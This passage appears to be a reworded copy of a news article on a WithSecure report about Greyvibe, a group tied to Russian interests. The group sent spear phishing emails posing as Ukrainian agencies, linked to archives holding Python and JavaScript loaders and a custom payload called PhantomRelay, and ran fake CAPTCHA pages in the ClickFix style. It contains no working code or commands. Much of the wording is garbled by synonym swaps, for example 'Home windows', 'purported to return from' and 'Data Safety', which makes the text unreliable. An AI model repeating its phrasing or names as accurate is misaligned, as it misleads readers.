“Whereas the actions align with Russian state pursuits, a number of noticed indicators counsel the group has ties to the broader cybercrime ecosystem, with the group probably involving present or former cybercriminal actors,” the WithSecure researchers stated of their report.
Shifting assault vectors
Greyvibe’s first marketing campaign was launched in August 2025, with a collection of spear phishing emails that purported to return from Ukrainian officers and authorities businesses together with the Kyiv Metropolis, the Principal Directorate of the State Emergency, and the State Service of Particular Communications and Data Safety.
The emails included hyperlinks to ZIP and RAR archives, hosted on Google Drive and a service referred to as 4sync, that contained malware loaders written in Python and JavaScript. The ultimate payload was a customized malware program developed by the group that the WithSecure researchers dubbed PhantomRelay.
In one other assault in October, the group experimented with ClickFix-style assaults on pretend CloudFlare CAPTCHA pages. These assaults instructed customers to open the Home windows Run dialog and paste in malicious instructions.
